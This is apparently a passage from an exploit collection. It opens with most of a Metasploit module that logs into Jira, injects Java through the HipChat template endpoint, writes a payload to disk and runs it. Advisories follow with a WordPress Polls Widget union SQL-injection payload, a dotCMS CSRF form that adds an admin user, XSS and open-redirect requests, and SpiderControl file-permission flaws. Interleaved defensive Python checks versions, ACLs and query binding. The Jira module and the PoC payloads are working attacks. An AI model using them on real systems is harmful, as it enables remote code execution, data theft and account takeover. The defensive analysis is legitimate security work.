  # be more reliable). If not, we will try the passive one (less accurately, but better than
  # nothing).
  #
  # @see #do_explicit_check
  # @see #do_passive_check
  #
  # @return [Array] Check code
  def check
    checkcode = Exploit::CheckCode::Safe

    if jira_cred_empty?
      vprint_status("No username and password supplied, so we can only do a passive check.")
      checkcode = do_passive_check
    else
      checkcode = do_explicit_check
    end

    checkcode
  end

  # Returns the Jira username set by the user
  def jira_username
    datastore['JIRAUSER']
  end

  # Returns the Jira password set by the user
  def jira_password
    datastore['JIRAPASS']
  end

  # Reports username and password to the database.
  #
  # @param opts [Hash]
  # @option opts [String] :user
  # @option opts [String] :password
  #
  # @return [void]
  def report_cred(opts)
    service_data = {
      address: rhost,
      port: rport,
      service_name: ssl ? 'https' : 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      module_fullname: fullname,
      post_reference_name: self.refname,
      private_data: opts[:password],
      origin_type: :service,
      private_type: :password,
      username: opts[:user]
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL,
      last_attempted_at: Time.now
    }.merge(service_data)

    create_credential_login(login_data)
  end

  # Returns a valid login cookie.
  #
  # @return [String]
  def do_login
    cookie = ''
    prerequisites = get_login_prerequisites
    xsrf = prerequisites['atlassian.xsrf.token']
    sid = prerequisites['JSESSIONID']

    uri = normalize_uri(target_uri.path, 'rest', 'gadget', '1.0', 'login')
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => uri,
      'headers'   => {
        'X-Requested-With' => 'XMLHttpRequest'
      },
      'cookie'    => "atlassian.xsrf.token=#{xsrf}; JSESSIONID=#{sid}",
      'vars_post' => {
        'os_username' => jira_username,
        'os_password' => jira_password,
        'os_captcha'  => '' # Not beatable yet
      }
    })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out while trying to login')
    end

    json = res.get_json_document
    if json.empty?
      fail_with(Failure::Unknown, 'Server returned a non-JSon response while trying to login.')
    end

    if json['loginSucceeded']
      cookie = res.get_cookies
    elsif !json['loginSucceeded'] && json['captchaFailure']
      fail_with(Failure::NoAccess, "#{jira_username} is protected by captcha. Please try a different account.")
    elsif !json['loginSucceeded']
      fail_with(Failure::NoAccess, 'Incorrect username or password')
    end

    report_cred(
      user: jira_username,
      password: jira_password
    )

    cookie
  end

  # Returns login prerequisites
  #
  # @return [Hash]
  def get_login_prerequisites
    uri = normalize_uri(target_uri.path, 'secure', 'Dashboard.jspa')
    res = send_request_cgi({ 'uri' => uri })

    unless res
      fail_with(Failure::Unknown, 'Connection timed out while getting login prerequisites')
    end

    get_cookie_as_hash(res.get_cookies)
  end

  # Returns the target platform.
  #
  # @param cookie [String] Jira cookie
  # @return [String]
  def get_target_platform(cookie)
    c = get_os_detection_code
    res = inject_template(c, cookie)
    json = res.get_json_document
    json['message'] || ''
  end

  # Returns Java code that can be used to inject to the template in order to write a file.
  #
  # @note This Java code is not able to properly close the file handle. So after using it, you should use #get_dup_file_code,
  #       and then execute the new file instead.
  #
  # @param fname [String] File to write to.
  # @param p [String] Payload
  # @return [String]
  def get_write_file_code(fname, p)
    b64 = Rex::Text.encode_base64(p)
    %Q| $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{b64}')) |
  end

  # Returns the Java code that gives us the remote Java home path.
  #
  # @return [String]
  def get_java_path_code
    get_java_property_code('java.home')
  end

  # Returns the OS/platform information.
# # @return [String] def get_os_detection_code get_java_property_code('os.name') end # Returns the temp path for Java. # # @return [String] def get_temp_path_code get_java_property_code('java.io.tmpdir') end # Returns a system property for Java. # # @param prop [String] Name of the property to retrieve. # @return [String] def get_java_property_code(prop) %Q| $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{prop}').toString() | end # Returns the Java code to execute a jar file. # # @param java_path [String] Java home path # @param war_path [String] The jar file to execute # @return [String] def get_jar_exec_code(java_path, war_path) # A quick way to check platform instead of actually grabbing os.name in Java system properties. if /^\/[[:print:]]+/ === war_path normalized_java_path = Rex::FileUtils.normalize_unix_path(java_path, '/bin/java') cmd_str = %Q|#{normalized_java_path} -jar #{war_path}| else normalized_java_path = Rex::FileUtils.normalize_win_path(java_path, '\\bin\\java.exe') war_path.gsub!(/Program Files/, 'PROGRA~1') cmd_str = %Q|cmd.exe /C #{normalized_java_path} -jar #{war_path}"| end %Q| $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{cmd_str}').waitFor() | end # Returns Java code that can be used to inject to the template in order to execute a file. # # @param cmd [String] command to execute # @return [String] def get_exec_code(cmd) %Q| $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{cmd}').waitFor() | end # Returns Java code that can be used to inject to the template in order to chmod a file. # # @param fname [String] File to chmod # @return [String] def get_chmod_code(fname) get_exec_code("chmod 777 #{fname}") end # Returns Java code that can be used to inject to the template in order to copy a file. 
# # @note The purpose of this method is to have a file that is not busy, so we can execute it. # It is meant to be used with #get_write_file_code. # # @param fname [String] The file to copy # @param new_fname [String] The new file # @return [String] def get_dup_file_code(fname, new_fname) if fname =~ /^\/[[:print:]]+/ cp_cmd = "cp #{fname} #{new_fname}" else cp_cmd = "cmd.exe /C copy #{fname} #{new_fname}" end get_exec_code(cp_cmd) end # Returns a boolean indicating whether the module has a username and password. # # @return [TrueClass] There is an empty cred. # @return [FalseClass] No empty cred. def jira_cred_empty? jira_username.blank? || jira_password.blank? end # Injects Java code to the template. # # @param p [String] Code that is being injected. # @param cookie [String] A cookie that contains a valid JSESSIONID # @return [void] def inject_template(p, cookie) login_sid = get_cookie_as_hash(cookie)['JSESSIONID'] uri = normalize_uri(target_uri.path, 'rest', 'hipchat', 'integrations', '1.0', 'message', 'render') uri << '/' res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'cookie' => "JSESSIONID=#{login_sid}", 'ctype' => 'application/json', 'data' => { 'message' => p }.to_json }) if !res # This seems to trigger every time even though we're getting a shell. So let's downplay # this a little bit. At least it's logged to allow the user to debug. elog('Connection timed out in #inject_template') elsif res && /Error report/ === res.body print_error('Failed to inject and execute code:') vprint_line(res.body) elsif res vprint_status("Server response:") vprint_line res.body end res end # Checks if the target os/platform is compatible with the module target or not. # # @return [TrueClass] Compatible # @return [FalseClass] Not compatible def target_platform_compat?(target_platform) target.platform.names.each do |n| if /^java$/i === n || /#{n}/i === target_platform return true end end false end # Returns the normalized file path for payload. 
# # @return [String] def normalize_payload_fname(tmp_path, fname) # A quick way to check platform insteaf of actually grabbing os.name in Java system properties. if /^\/[[:print:]]+/ === tmp_path Rex::FileUtils.normalize_unix_path(tmp_path, fname) else Rex::FileUtils.normalize_win_path(tmp_path, fname) end end # Returns a temp path from the remote target. # # @param cookie [String] Jira cookie # @return [String] def get_tmp_path(cookie) c = get_temp_path_code res = inject_template(c, cookie) json = res.get_json_document json['message'] || '' end # Returns the Java home path used by Jira. # # @param cookie [String] Jira cookie. # @return [String] def get_java_home_path(cookie) c = get_java_path_code res = inject_template(c, cookie) json = res.get_json_document json['message'] || '' end # Exploits the target in Java platform. # # @return [void] def exploit_as_java(cookie) tmp_path = get_tmp_path(cookie) if tmp_path.blank? fail_with(Failure::Unknown, 'Unable to get the temp path.') end jar_fname = normalize_payload_fname(tmp_path, "#{Rex::Text.rand_text_alpha(5)}.jar") jar = payload.encoded_jar java_home = get_java_home_path(cookie) register_files_for_cleanup(jar_fname) if java_home.blank? fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.') else print_status("Found Java home path: #{java_home}") end print_status("Attempting to write #{jar_fname}") c = get_write_file_code(jar_fname, jar) inject_template(c, cookie) print_status("Executing #{jar_fname}") c = get_jar_exec_code(java_home, jar_fname) inject_template(c, cookie) end # Exploits the target in Windows platform. # # @return [void] def exploit_as_windows(cookie) tmp_path = get_tmp_path(cookie) if tmp_path.blank? 
fail_with(Failure::Unknown, 'Unable to get the temp path.') end exe = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform) exe_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe") exe_new_fname = normalize_payload_fname(tmp_path,"#{Rex::Text.rand_text_alpha(5)}.exe") exe_fname.gsub!(/Program Files/, 'PROGRA~1') exe_new_fname.gsub!(/Program Files/, 'PROGRA~1') register_files_for_cleanup(exe_fname, exe_new_fname) print_status("Attempting to write #{exe_fname}") c = get_write_file_code(exe_fname, exe) inject_template(c, cookie) print_status("New file will be #{exe_new_fname}") c = get_dup_file_code(exe_fname, exe_new_fname) inject_template(c, cookie) print_status("Executing #{exe_new_fname}") c = get_exec_code(exe_new_fname) inject_template(c, cookie) end # Exploits the target in Linux platform. # # @return [void] def exploit_as_linux(cookie) tmp_path = get_tmp_path(cookie) if tmp_path.blank? fail_with(Failure::Unknown, 'Unable to get the temp path.') end fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5)) new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6)) register_files_for_cleanup(fname, new_fname) print_status("Attempting to write #{fname}") p = generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform) c = get_write_file_code(fname, p) inject_template(c, cookie) print_status("chmod +x #{fname}") c = get_exec_code("chmod 777 #{fname}") inject_template(c, cookie) print_status("New file will be #{new_fname}") c = get_dup_file_code(fname, new_fname) inject_template(c, cookie) print_status("Executing #{new_fname}") c = get_exec_code(new_fname) inject_template(c, cookie) end def exploit if jira_cred_empty? 
fail_with(Failure::BadConfig, 'Jira username and password are required.') end print_status("Attempting to login as #{jira_username}:#{jira_password}") cookie = do_login print_good("Successfully logged in as #{jira_username}") target_platform = get_target_platform(cookie) print_status("Target being detected as: #{target_platform}") unless target_platform_compat?(target_platform) fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.') end case target.name when /java$/i exploit_as_java(cookie) when /windows$/i exploit_as_windows(cookie) when /linux$/i exploit_as_linux(cookie) end end def print_status(msg='') super("#{peer} - #{msg}") end def print_good(msg='') super("#{peer} - #{msg}") end def print_error(msg='') super("#{peer} - #{msg}") end end
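As an added example (not part of the Metasploit module above), the following Python reproduces the module's passive check in a form a defender can run against their own Jira inventory: it pulls the ajs-version-number meta tag that Dashboard.jspa exposes and compares it numerically against the affected range 6.3.5 <= version < 6.4.11. A plain string comparison misorders versions such as 6.4.9 against 6.4.11, which is why the comparison here is done on integer tuples. The HTML fragment is constructed for the example, not captured from a real host.

```python
import re
from html.parser import HTMLParser

# Affected range from the advisory: 6.3.5 (inclusive) up to, but not including, 6.4.11.
AFFECTED_MIN = (6, 3, 5)
AFFECTED_MAX = (6, 4, 11)

# Constructed Dashboard.jspa fragment in the shape Jira emits; not captured from a real host.
SAMPLE_DASHBOARD = (
    '<html><head><meta name="ajs-version-number" content="6.4.9">'
    '<title>Dashboard</title></head><body></body></html>'
)


class _MetaVersionParser(HTMLParser):
    """Collects the content attribute of <meta name="ajs-version-number">."""

    def __init__(self):
        super().__init__()
        self.version = None

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        a = dict(attrs)
        if a.get("name") == "ajs-version-number" and a.get("content"):
            self.version = a["content"].strip()


def extract_jira_version(html):
    """Return the advertised Jira version string, or None if the tag is absent."""
    p = _MetaVersionParser()
    p.feed(html)
    return p.version


def parse_version(text):
    """'6.4.9' -> (6, 4, 9); None for anything that is not dotted digits."""
    if not re.fullmatch(r"\d+(?:\.\d+)*", text or ""):
        return None
    return tuple(int(x) for x in text.split("."))


def in_affected_range(version_text):
    """Numeric comparison, so 6.4.9 is correctly placed below 6.4.11."""
    v = parse_version(version_text)
    return v is not None and AFFECTED_MIN <= v < AFFECTED_MAX


def classify(html):
    """'appears' for the affected range, 'detected' for any other Jira version,
    'safe' when no Jira version tag is present at all."""
    version = extract_jira_version(html)
    if version is None:
        return "safe"
    return "appears" if in_affected_range(version) else "detected"
```

The version tag only tells you the Jira release; whether the HipChat for Jira plugin is installed still has to be confirmed from the plugin manager, so treat "appears" as a prompt to check, not a confirmed exposure.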
-
iniNet SpiderControl SCADA Web Server Service 2.02 - Insecure File Permissions
iniNet SpiderControl SCADA Web Server Service 2.02 Insecure File Permissions


Vendor: iniNet Solutions GmbH
Product web page: http://www.spidercontrol.net
Affected version: 2.02.0000

Summary: Modular and automated engineering is provided for HMI and SCADA. The tools are
developed to join a large range of engineering modules together quickly. We modularize our
software, as the mechanics of a system are modularized today. Easy to visualize with a few
clicks.

Desc: SpiderControl SCADA Web Server Service suffers from an elevation of privileges
vulnerability which can be used by a simple user that can change the executable file with
a binary of choice. The vulnerability exists due to improper permissions: the 'C' (Change)
flag for the 'Everyone' and 'Authenticated Users' groups makes the entire 'WWW' directory,
its files and sub-directories world-writable.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2015-5284
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5284.php

22.10.2015

--

C:\WWW>dir
 Volume in drive C is Windows
 Volume Serial Number is 56F3-8688

 Directory of C:\WWW

22/10/2015  10:54    <DIR>          .
22/10/2015  10:54    <DIR>          ..
22/10/2015  10:55    <DIR>          HMI
07/02/2008  23:41           147,968 libnodave.dll
22/10/2015  10:54    <DIR>          Manual
07/07/2015  12:03         1,687,552 SCADAControlPanel.exe
07/07/2015  12:03           203,776 ScadaWindowsService.exe
22/10/2015  10:54             3,092 unins000.dat
22/10/2015  10:53           719,496 unins000.exe
07/07/2015  12:07           793,088 ZelsWebServ.dll
22/10/2015  10:54             1,546 ZelsWebServ.xml
22/10/2015  10:55            38,696 ZelsWebServ_log.txt
               8 File(s)      3,595,214 bytes
               4 Dir(s)  77,683,298,304 bytes free

C:\WWW>cacls *.exe
C:\WWW\SCADAControlPanel.exe Everyone:C
                             BUILTIN\Administrators:(ID)F
                             NT AUTHORITY\SYSTEM:(ID)F
                             BUILTIN\Users:(ID)R
                             NT AUTHORITY\Authenticated Users:(ID)C

C:\WWW\ScadaWindowsService.exe Everyone:C
                               BUILTIN\Administrators:(ID)F
                               NT AUTHORITY\SYSTEM:(ID)F
                               BUILTIN\Users:(ID)R
                               NT AUTHORITY\Authenticated Users:(ID)C

C:\WWW\unins000.exe BUILTIN\Administrators:(ID)F
                    NT AUTHORITY\SYSTEM:(ID)F
                    BUILTIN\Users:(ID)R
                    NT AUTHORITY\Authenticated Users:(ID)C

---

C:\Users\joxy>sc qc SCADAServer
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SCADAServer
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WWW\ScadaWindowsService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SCADA Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
-
iniNet SpiderControl PLC Editor Simatic 6.30.04 - Insecure File Permissions
iniNet SpiderControl PLC Editor Simatic 6.30.04 Insecure File Permissions


Vendor: iniNet Solutions GmbH
Product web page: http://www.spidercontrol.net
Affected version: 6.30.04 (Build 6300400)

Summary: Modular and automated engineering is provided for HMI and SCADA. The tools are
developed to join a large range of engineering modules together quickly. We modularize our
software, as the mechanics of a system are modularized today. Easy to visualize with a few
clicks.

Desc: SpiderControl PLC Editor Simatic suffers from an elevation of privileges vulnerability
which can be used by a simple user that can change the executable file with a binary of
choice. The vulnerability exists due to improper permissions: the 'F' (Full) flag for the
'Everyone' group and the 'C' (Change) flag for the 'Authenticated Users' group make the
entire 'PLCEditorSimatic_6300400' directory, its files and sub-directories world-writable.

Tested on: Microsoft Windows 7 Professional SP1 (EN)
           Microsoft Windows 7 Ultimate SP1 (EN)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2015-5283
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5283.php

22.10.2015

--

C:\SpiderControl\PLCEditorSimatic_6300400>cacls PLCEditorSimatic.exe
C:\SpiderControl\PLCEditorSimatic_6300400\PLCEditorSimatic.exe Everyone:(ID)F
                                                               BUILTIN\Administrators:(ID)F
                                                               NT AUTHORITY\SYSTEM:(ID)F
                                                               BUILTIN\Users:(ID)R
                                                               NT AUTHORITY\Authenticated Users:(ID)C

C:\SpiderControl\PLCEditorSimatic_6300400>dir
 Volume in drive C is Windows
 Volume Serial Number is 56F3-8688

 Directory of C:\SpiderControl\PLCEditorSimatic_6300400

22/10/2015  10:10    <DIR>          .
22/10/2015  10:10    <DIR>          ..
09/05/2012  14:03               379 fontconfig.txt
22/10/2015  10:10    <DIR>          HTML5Comp
22/10/2015  10:10    <DIR>          HWSpecific
24/06/2015  18:42           386,812 IMasterSimatic6_30_04.jar
22/10/2015  10:10    <DIR>          ImportNConvertComp
22/10/2015  10:10    <DIR>          MacroDlgComp
22/10/2015  10:10    <DIR>          MacroDlgRuntime
22/10/2015  10:10    <DIR>          MacroLib
22/10/2015  10:10    <DIR>          MacroLibTempFiles
26/04/2005  15:26               320 MsgBox.teq
22/10/2015  10:10    <DIR>          News_ReleaseNotes
06/06/2012  11:06                81 PLCEditorExtraBatch.bat
11/01/2013  12:29               727 PLCEditorKey.spl
02/07/2015  22:58         7,997,440 PLCEditorSimatic.exe
26/11/2014  19:04             3,806 PLCPPOCheckCfgSimaticPLC.xml
02/07/2015  18:25         2,958,336 PLC_FontGenerator.exe
22/10/2015  10:10    <DIR>          Projects
17/06/2015  10:58            34,275 PropWndDescript.xml
25/04/2014  16:55           104,254 s7api.jar
18/05/2015  12:28            42,478 ScadaDescript.xml
10/01/2011  15:09               208 ScadaPPOList.csv
22/10/2015  10:10    <DIR>          SCUtils
09/02/2015  13:27             8,242 SimaticDefaultSpiderHWProfile.shp
01/07/2015  16:36         2,693,569 SimaticPLCHelp.chm
22/10/2015  10:30    <DIR>          SimulateRuntime
22/10/2015  10:10    <DIR>          SimulationComp
06/09/2012  11:13            65,536 SpiderLink1.dll
06/09/2012  11:13            65,536 SpiderLink2.dll
06/09/2012  11:13            65,536 SpiderLink3.dll
06/09/2012  11:13            65,536 SpiderLink4.dll
02/07/2015  18:26           265,216 SpiderObserver.dll
02/07/2015  18:25           269,824 SpiderOPCBrowser.dll
02/07/2015  23:42           483,328 SPSVarSelectorCsv.dll
02/07/2015  18:26           430,080 SPSVarSelectorTpy.dll
22/10/2015  10:10    <DIR>          SVGComp
22/10/2015  10:10            86,988 unins000.dat
22/10/2015  10:10           736,929 unins000.exe
10/01/2011  15:05                28 ZelsCfg.csv
22/10/2015  10:10    <DIR>          ZipComp
              25 File(s)     16,765,464 bytes
              16 Dir(s)  77,686,059,008 bytes free

C:\SpiderControl\PLCEditorSimatic_6300400>cd ..

C:\SpiderControl>cacls PLCEditorSimatic_6300400
C:\SpiderControl\PLCEditorSimatic_6300400 Everyone:(OI)(CI)F
                                          BUILTIN\Administrators:(ID)F
                                          BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
                                          NT AUTHORITY\SYSTEM:(ID)F
                                          NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
                                          BUILTIN\Users:(OI)(CI)(ID)R
                                          NT AUTHORITY\Authenticated Users:(ID)C
                                          NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
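The cacls output in both SpiderControl advisories above can be checked mechanically. The following Python is an added example, not part of either advisory: it parses cacls output and flags ACEs that grant Change (C), Write (W) or Full (F) access to Everyone, Authenticated Users, BUILTIN\Users or INTERACTIVE, which is exactly the pattern that lets any local user swap a LocalSystem service binary. The sample output is a constructed copy of the advisory's listing for C:\WWW.

```python
import re

# Principals that should never hold write-class access on a service binary or its directory.
LOW_PRIV_PRINCIPALS = {
    "everyone",
    r"nt authority\authenticated users",
    r"nt authority\interactive",
    r"builtin\users",
}
WRITE_PERMS = {"C", "W", "F"}   # cacls letters: Change, Write, Full control

# One cacls ACE: "<trustee>:<inheritance flags><permission letters>", e.g. "BUILTIN\Users:(ID)R"
ACE_RE = re.compile(r"^(?P<trustee>[^:]+):(?P<flags>(?:\([A-Z]+\))*)(?P<perm>[A-Z]+)$")

# Constructed sample in the exact layout cacls prints (mirrors the advisory's C:\WWW listing).
SAMPLE_CACLS = r"""C:\WWW\SCADAControlPanel.exe Everyone:C
                             BUILTIN\Administrators:(ID)F
                             NT AUTHORITY\SYSTEM:(ID)F
                             BUILTIN\Users:(ID)R
                             NT AUTHORITY\Authenticated Users:(ID)C
C:\WWW\unins000.exe BUILTIN\Administrators:(ID)F
                    NT AUTHORITY\SYSTEM:(ID)F
                    BUILTIN\Users:(ID)R
                    NT AUTHORITY\Authenticated Users:(ID)C
"""


def _split_ace(text):
    m = ACE_RE.match(text.strip())
    return (m.group("trustee"), m.group("flags"), m.group("perm")) if m else None


def parse_cacls(output):
    """Return {path: [(trustee, flags, perm), ...]} from cacls text output.

    cacls prints "<path> <first ACE>" and indents every further ACE of the same
    object to the column where the first ACE began, so that indentation tells
    us where the path ends (paths and trustees may both contain spaces).
    """
    objects = []                      # [first_line, [continuation lines]]
    for raw in output.splitlines():
        if not raw.strip():
            continue
        if raw[0].isspace() and objects:
            objects[-1][1].append(raw)
        else:
            objects.append([raw.rstrip(), []])

    result = {}
    for first, rest in objects:
        if rest:
            col = len(rest[0]) - len(rest[0].lstrip())
            cut = first.rfind(" ", 0, col + 1)   # last separator at or before the ACE column
        else:
            cut = first.find(" ")                 # single ACE: assume the path has no spaces
        if cut < 0:
            continue
        path, first_ace = first[:cut], first[cut + 1:]
        aces = [_split_ace(first_ace)] + [_split_ace(line) for line in rest]
        result[path] = [a for a in aces if a]
    return result


def weak_aces(output):
    """(path, trustee, perm) for every ACE giving a low-privileged principal write-class access."""
    findings = []
    for path, aces in parse_cacls(output).items():
        for trustee, _flags, perm in aces:
            if trustee.lower() in LOW_PRIV_PRINCIPALS and set(perm) & WRITE_PERMS:
                findings.append((path, trustee, perm))
    return findings
```

Feed it the output of `cacls <dir> /T` and treat any hit on a path that appears in a service's BINARY_PATH_NAME (as in the sc qc output above) as a local privilege-escalation finding. The remediation is an ACL where only Administrators and SYSTEM hold write access to the install directory; `icacls <dir> /remove:g Everyone /T` is one way to strip the offending grant until the vendor ships a corrected installer.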
-
WordPress Plugin Polls Widget 1.0.7 - SQL Injection
Exploit Title : wordpress poll widget version 1.0.7 SQL Injection vulnerability
Author : WICS
Date : 7/12/2015
Software Link : https://wordpress.org/plugins/polls-widget/
Affected Version: 1.0.7 and below

Overview:
Polls Widget is a WordPress plugin that provides a polling layout for website visitors, who vote on the options offered by a specific poll. The plugin has 2000+ active installations.

The vulnerability is in front_end.php, where the user-supplied question_id parameter is used without any filtering:

line no. 36
$question_id=$_POST['question_id'];
....
....
line no. 94-->
$answer=$wpdb->get_results('SELECT `answer_name`,`vote` FROM '.$wpdb->prefix.'polls WHERE question_id='.$question_id,ARRAY_A);
print_r(json_encode($answer, JSON_FORCE_OBJECT));

The script is therefore vulnerable to union-based SQL injection with a column count of 2.

POC
http://localhost/wp-admin/admin-ajax.php?action=pollinsertvalues

In the POST data, add this:
question_id=1337 union select group_concat(0x7e,(select(@)from(select(@:=0x00),(select(@)from(information_schema.tables)where table_schema=database() and (@)in(@:=concat(@,0x3C62723E,table_name))))a)),2-- -&poll_answer_securety=4ac4f387e2&date_answers[0]=5
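The plugin's query concatenates $question_id straight into SQL; in WordPress the fix is $wpdb->prepare() with a %d placeholder (or an explicit intval()) so that the value is bound as an integer instead of spliced into the statement. As an added example, not code from the plugin, the following Python rebuilds the same query over an in-memory SQLite table so the vulnerable and hardened forms can be compared side by side; the polls rows and the 'secrets' table are constructed sample data.

```python
import re
import sqlite3

PREFIX = "wp_"  # stands in for $wpdb->prefix


def make_db():
    """In-memory stand-in for the plugin's polls table plus an unrelated table
    that a UNION can reach. All rows are constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.execute(f"CREATE TABLE {PREFIX}polls (question_id INTEGER, answer_name TEXT, vote INTEGER)")
    db.executemany(
        f"INSERT INTO {PREFIX}polls VALUES (?, ?, ?)",
        [(1, "yes", 10), (1, "no", 4), (2, "maybe", 1)],
    )
    db.execute("CREATE TABLE secrets (k TEXT, v TEXT)")
    db.execute("INSERT INTO secrets VALUES ('admin_hash', 'constructed-sample-hash')")
    return db


def answers_vulnerable(db, question_id):
    """Mirror of front_end.php line 94: the raw value is concatenated into the SQL,
    so anything after the number becomes part of the statement."""
    sql = f"SELECT answer_name, vote FROM {PREFIX}polls WHERE question_id=" + str(question_id)
    return db.execute(sql).fetchall()


def answers_hardened(db, question_id):
    """Type-check, then bind the value: the equivalent of
    $wpdb->prepare('SELECT ... WHERE question_id=%d', $question_id)."""
    text = str(question_id).strip()
    if not re.fullmatch(r"[0-9]+", text):
        raise ValueError("question_id must be a non-negative integer")
    sql = f"SELECT answer_name, vote FROM {PREFIX}polls WHERE question_id=?"
    return db.execute(sql, (int(text),)).fetchall()


def hardened_rejects(db, value):
    """True if the hardened path refuses the value instead of querying with it."""
    try:
        answers_hardened(db, value)
    except ValueError:
        return True
    return False
```

The two-column UNION works against the vulnerable form because the SELECT list has exactly two columns, which is the "column count 2" the advisory refers to; with the value bound as a parameter the same input is rejected before any SQL is built.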
-
dotCMS 3.2.4 - Multiple Vulnerabilities
dotCMS 3.2.4 Multiple Vulnerabilities


Vendor: dotCMS Software, LLC
Product web page: http://www.dotcms.com
Affected version: 3.2.4 (Enterprise)

Summary: DotCMS is the next generation of Content Management System (CMS). Quick to deploy,
open source, Java-based, open APIs, extensible and massively scalable, dotCMS can rapidly
deliver personalized, engaging multi-channel sites, web apps, campaigns, one-pagers,
intranets - all types of content driven experiences - without calling in your developers.

Desc: The application suffers from multiple security vulnerabilities including: Open
Redirection, multiple Stored and Reflected XSS and Cross-Site Request Forgery (CSRF).

Tested on: Apache-Coyote/1.1

Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience

Advisory ID: ZSL-2015-5290
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5290.php
Vendor: http://dotcms.com/docs/latest/change-log
        https://github.com/dotCMS/core/commit/7b86fc850bf547e8c82366240dae27e7e56b4305
        https://github.com/dotCMS/core/commit/1fdebbbd76619992356e9443230e35be8a2b60c3

19.11.2015

--

1. Open Redirect via '_EXT_LANG_redirect' GET parameter:
--------------------------------------------------------

http://127.0.0.1/c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=EXT_LANG&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_LANG_struts_action=%2Fext%2Flanguages_manager%2Fedit_language&_EXT_LANG_cmd=save&_EXT_LANG_redirect=http://zeroscience.mk&id=0&languageCode=MK&countryCode=MK&language=Macedonian&country=Macedonia


2. CSRF Add Admin:
------------------

<html>
  <body>
    <form action="http://127.0.0.1/dwr/call/plaincall/UserAjax.addUser.dwr" method="POST" enctype="text/plain">
      <input type="hidden" name="callCount" value="1
windowName=c0-param2
c0-scriptName=UserAjax
c0-methodName=addUser
c0-id=0
c0-param0=null:null
c0-param1=string:TEST2
c0-param2=string:AAAA2
c0-param3=string:AAA2%40bb.net
c0-param4=string:123123
batchId=3
instanceId=0
page=%2Fc%2Fportal%2Flayout%3Fp_l_id%3Da8e430e3-8010-40cf-ade1-5978e61241a8%26p_p_id%3DEXT_USER_ADMIN%26p_p_action%3D0%26%26dm_rlout%3D1%26r%3D1448026121316
scriptSessionId=hd2XkJoJcyP9lEk5N8qUe*ouv5l/mn17B5l-IA*1ZViJ6
" />
      <input type="submit" value="Tutaj" />
    </form>
  </body>
</html>


3. Multiple Stored And Reflected XSS:
-------------------------------------

POST /dwr/call/plaincall/TagAjax.addTag.dwr HTTP/1.1
Host: 127.0.0.1

callCount=1
windowName=c0-param0
c0-scriptName=TagAjax
c0-methodName=addTag
c0-id=0
c0-param0=<script>alert(1)<%2fscript>
c0-param1=string:
c0-param2=string:48190c8c-42c4-46af-8d1a-0cd5db894797%20
batchId=2
instanceId=0

......

POST /dwr/call/plaincall/CategoryAjax.saveOrUpdateCategory.dwr HTTP/1.1
Host: 127.0.0.1

callCount=1
windowName=c0-param5
c0-scriptName=CategoryAjax
c0-methodName=saveOrUpdateCategory
c0-id=0
c0-param0=boolean:true
c0-param1=null:null
c0-param2=<script>alert(2)<%2fscript>
c0-param3=string:ppp
c0-param4=string:aaa
c0-param5=string:bbb
batchId=2
instanceId=0

......

POST /c/portal/layout?p_l_id=a8e430e3-8010-40cf-ade1-5978e61241a8&p_p_id=EXT_LUCENE_TOOL&p_p_action=0& HTTP/1.1
Host: 127.0.0.1

query=aaaa
offset="><script>alert(3)<%2fscript>
limit=20
sort=1
userid=admin
reindexResults=true

......

http://127.0.0.1/DotAjaxDirector/com.dotmarketing.portlets.osgi.AJAX.OSGIAJAX [jar parameter]
http://127.0.0.1/api/portlet/ES_SEARCH_PORTLET/render [URL path filename]
http://127.0.0.1/c/portal/layout [limit parameter]
http://127.0.0.1/c/portal/layout [offset parameter]
http://127.0.0.1/c/portal/layout [query parameter]
http://127.0.0.1/c/portal/layout [sort parameter]
http://127.0.0.1/html/portlet/ext/sitesearch/test_site_search_results.jsp [testIndex parameter]
http://127.0.0.1/html/portlet/ext/sitesearch/test_site_search_results.jsp [testQuery parameter]
